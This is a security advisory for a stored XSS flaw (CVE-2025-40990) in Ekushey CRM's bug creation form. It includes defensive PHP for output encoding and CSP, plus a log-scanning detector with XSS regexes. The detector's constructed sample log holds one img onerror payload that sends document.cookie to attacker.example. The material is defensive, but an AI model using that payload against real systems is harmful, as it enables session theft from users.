CVE-2025-40990
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Ekushey CRM v5.0 allows an authenticated user to inject script through the project bug creation form. The title and description fields are not adequately validated on submission or encoded on output, so the payload is stored and executes in the browser of any other user who later views the bug report, which can expose that viewer's session cookie.
💻 Affected Systems
- Ekushey CRM
📦 What is this software?
Ekushey CRM is a PHP-based project management and customer relationship management web application from Creativeitem, the vendor named in the advisory linked below. The endpoint paths on this page assume it is deployed under /ekushey/ on a customer-managed web server.
⚠️ Risk & Real-World Impact
Worst Case
An attacker steals an administrator's session cookie (or drives the administrator's browser to act on their behalf), gains full administrative access to the CRM, and from there exposes the organization's customer data and business records.
Likely Case
An attacker steals or rides the sessions of staff who review bug reports, impersonates them, reads customer information, and performs unauthorized actions in the CRM.
If Mitigated
With server-side validation on submission and HTML output encoding in the views that render bug reports, the payload is displayed as literal text rather than executed, and normal functionality is unaffected. Marking the session cookie HttpOnly limits cookie theft but does not stop actions the script performs from within the victim's session.
🎯 Exploit Status
Exploitation requires an authenticated account that can submit the project bug creation form (the affected endpoint sits under the client controller), but the payloads themselves are ordinary stored-XSS strings. Once an attacker holds any such account, weaponizing the flaw is straightforward.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-creativeitem-products
Restart Required: No
Instructions:
1. Monitor the vendor website and the INCIBE advisory for security updates.
2. Apply vendor-provided patches when available.
3. Test patches in a development environment before production deployment.
🔧 Temporary Workarounds
Input Validation and Output Encoding
Implement server-side validation for the project bug creation form and HTML-encode the stored values wherever they are rendered.
Modify /ekushey/index.php/client/project_bug/create/xxx to validate the title and description parameters (type, length, allowed characters), and encode both fields in the views that display bug reports, since that is where the stored script executes. Encode at render time rather than only on input: encoding data on the way in breaks legitimate text and is missed by any other code path that writes the same fields.
Content Security Policy (CSP)
Implement a strict CSP header that disallows inline scripts and restricts script sources to the application's own origin.
Add a Content-Security-Policy header in the web server configuration. Deploy it first as Content-Security-Policy-Report-Only, because a PHP application of this kind commonly relies on inline scripts that a strict policy will block. CSP reduces impact but is a second layer, not a replacement for output encoding.
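The two workarounds above written out as an added example. This is not Ekushey's own code (which is not reproduced on this page): a validation function for the create handler, an encoding helper for the view that renders a bug, the vulnerable rendering beside the hardened one, and the CSP header. Function names, the $bug array layout and the exact policy string are assumptions for illustration.

```php
<?php
// Added example, not Ekushey CRM's own code. Shows the workaround pattern:
// validate on submit, HTML-encode on output, and send a CSP as a second layer.
// Function names, array keys and the policy string are hypothetical.

declare(strict_types=1);

// Validation belongs in the create handler. Length limits bound what an
// attacker can store, but encoding on output is what actually stops the XSS.
function validate_bug_input(array $post): array
{
    $title = trim((string) ($post['title'] ?? ''));
    $description = trim((string) ($post['description'] ?? ''));

    if ($title === '' || mb_strlen($title) > 200) {
        throw new InvalidArgumentException('title must be 1-200 characters');
    }
    if (mb_strlen($description) > 5000) {
        throw new InvalidArgumentException('description must be at most 5000 characters');
    }
    return ['title' => $title, 'description' => $description];
}

// Encode for an HTML text or attribute context. ENT_QUOTES covers both quote
// styles, ENT_SUBSTITUTE avoids returning an empty string on bad UTF-8.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering: stored values are interpolated into the page as-is,
// so a stored <script> tag reaches the viewer's browser intact.
function render_bug_vulnerable(array $bug): string
{
    return "<h2>{$bug['title']}</h2><div class=\"description\">{$bug['description']}</div>";
}

// Hardened rendering: every untrusted value passes through h() at the point
// where it is written into HTML.
function render_bug_hardened(array $bug): string
{
    return '<h2>' . h($bug['title']) . '</h2>'
        . '<div class="description">' . h($bug['description']) . '</div>';
}

// Defence in depth: block inline script even if one view misses the encoding.
// Start with the Report-Only header name until the app's own inline scripts
// have been moved to external files, otherwise the CSP will break the UI.
function send_csp_header(bool $reportOnly = true): void
{
    $policy = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'";
    $name = $reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
    header($name . ': ' . $policy);
}

// Constructed sample: the verification payload from this page, plus a
// description that is plain text. This is test data, not captured traffic.
send_csp_header();
$bug = validate_bug_input([
    'title' => "<script>alert('XSS')</script>",
    'description' => 'Login page hangs after submitting the form & nothing is saved',
]);

echo "vulnerable: ", render_bug_vulnerable($bug), PHP_EOL; // script tag survives
echo "hardened:   ", render_bug_hardened($bug), PHP_EOL;   // angle brackets and quotes are entities
```

Run it with `php example.php`: the first line contains a live script element, the second renders the same stored value as inert text. In the real application the encoding call goes into every view that prints a bug's title or description, not only the detail page; lists, dashboards and e-mail templates are easy to miss.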
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in POST requests to the vulnerable endpoint. Match on the URL-decoded body, since form submissions carry the payload as %3Cscript%3E rather than <script>, and expect case variations and event-handler attributes (onerror=, onload=) as well as script tags
- Limit which accounts can file project bugs, and restrict the client portal to trusted networks (VPN or IP allow-list) where the business allows it
🔍 How to Verify
Check if Vulnerable:
In a non-production copy, submit a harmless payload such as <script>alert('XSS')</script> in the title or description field of the project bug creation form, then open the bug report as another user. If the alert fires, the instance is vulnerable. Check the page source as well: a secure instance serves the stored value as &lt;script&gt; and displays it as literal text.
Check Version:
Check the CRM version in the admin panel or in the application's configuration files; v5.0 is the version named in the advisory.
Verify Fix Applied:
Retest with the same payloads after applying fixes and confirm they render as inert text wherever bug reports are displayed. If CSP was deployed, also confirm the Content-Security-Policy header is present in responses.
📡 Detection & Monitoring
Log Indicators:
- POST requests to /ekushey/index.php/client/project_bug/create/xxx whose parameters contain script tags, javascript: URLs or event-handler attributes, including URL-encoded forms such as %3Cscript%3E
- Multiple failed login attempts (credential guessing) followed by a successful authentication and a bug submission containing such a payload
Network Indicators:
- HTTP POST requests to the vulnerable endpoint whose body contains script tags or JavaScript; visible only with TLS inspection or at a reverse proxy or WAF that logs request bodies
SIEM Query:
source="web_logs" AND uri="/ekushey/index.php/client/project_bug/create/*" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")
The query is pseudo-syntax; adapt field names to your platform. It only works where request bodies are logged, and it should run against the URL-decoded body (or be extended with the encoded forms %3Cscript%3E and javascript%3A), otherwise form-encoded submissions are missed.
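The detection logic above applied to log records, as an added example that is not part of the original page or the vendor's tooling. It assumes a reverse proxy or WAF that writes one JSON object per request including the body (a hypothetical format; the sample records are constructed, not captured traffic), and it URL-decodes the body before matching so that the form-encoded payload is actually seen.

```php
<?php
// Added example, not from the original page. Scans JSON-lines request logs
// for XSS payloads posted to the Ekushey bug creation endpoint. The log
// format and field names (uri, method, body, src_ip, user) are assumptions.

declare(strict_types=1);

const TARGET_PREFIX = '/ekushey/index.php/client/project_bug/create/';

// Starter patterns, case-insensitive. Tune against your own traffic; the
// event-handler list is deliberately short to limit false positives.
const XSS_PATTERNS = [
    '/<\s*script\b/i',
    '/javascript\s*:/i',
    '/\bon(error|load|click|mouseover|focus)\s*=/i',
    '/<\s*(img|svg|iframe)\b/i',
];

function is_target_uri(string $uri): bool
{
    return strncmp($uri, TARGET_PREFIX, strlen(TARGET_PREFIX)) === 0;
}

// Form bodies arrive URL-encoded (%3Cscript%3E). Decoding twice also catches
// double-encoded payloads (%253C); the cost is that a literal '+' becomes a
// space, which is harmless for pattern matching.
function decode_body(string $body): string
{
    return urldecode(urldecode($body));
}

// Returns one hit per matching record with enough context to pivot on.
function find_xss_submissions(array $jsonLines): array
{
    $hits = [];
    foreach ($jsonLines as $line) {
        $rec = json_decode($line, true);
        if (!is_array($rec) || ($rec['method'] ?? '') !== 'POST') {
            continue;
        }
        if (!is_target_uri((string) ($rec['uri'] ?? ''))) {
            continue;
        }
        $body = decode_body((string) ($rec['body'] ?? ''));
        foreach (XSS_PATTERNS as $pattern) {
            if (preg_match($pattern, $body) === 1) {
                $hits[] = [
                    'ts'      => $rec['ts'] ?? '',
                    'src_ip'  => $rec['src_ip'] ?? '',
                    'user'    => $rec['user'] ?? '',
                    'uri'     => $rec['uri'],
                    'pattern' => $pattern,
                    'body'    => $body,
                ];
                break; // one hit per record is enough
            }
        }
    }
    return $hits;
}

// Constructed sample log (not real traffic). Record 1 is the page's test
// payload, form-encoded; record 2 is a benign bug; record 3 is an event
// handler in the description; record 4 hits another endpoint and is ignored.
$sample = [
    '{"ts":"2025-06-01T10:00:01Z","src_ip":"203.0.113.7","user":"client12","method":"POST","uri":"/ekushey/index.php/client/project_bug/create/42","body":"title=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&description=test"}',
    '{"ts":"2025-06-01T10:02:15Z","src_ip":"198.51.100.4","user":"client03","method":"POST","uri":"/ekushey/index.php/client/project_bug/create/42","body":"title=Login+page+hangs&description=After+submit+nothing+is+saved"}',
    '{"ts":"2025-06-01T10:05:40Z","src_ip":"203.0.113.7","user":"client12","method":"POST","uri":"/ekushey/index.php/client/project_bug/create/7","body":"title=broken&description=%3Cimg+src%3Dx+onerror%3Dfetch%28%27https%3A%2F%2Fattacker.example%2F%27%2Bdocument.cookie%29%3E"}',
    '{"ts":"2025-06-01T10:06:00Z","src_ip":"203.0.113.7","user":"client12","method":"POST","uri":"/ekushey/index.php/client/login","body":"email=x&password=%3Cscript%3E"}',
];

foreach (find_xss_submissions($sample) as $hit) {
    printf("%s %s user=%s uri=%s matched=%s\n%s\n\n",
        $hit['ts'], $hit['src_ip'], $hit['user'], $hit['uri'], $hit['pattern'], $hit['body']);
}
```

Records 1 and 3 are reported; record 2 is clean and record 4 targets a different endpoint. Feeding the decoded body into the match is the part that most SIEM queries written against raw access logs get wrong: the literal string `<script>` never appears in a standard form submission. The same source IP and user appearing on both hits is the kind of pivot the "Log Indicators" list above calls for.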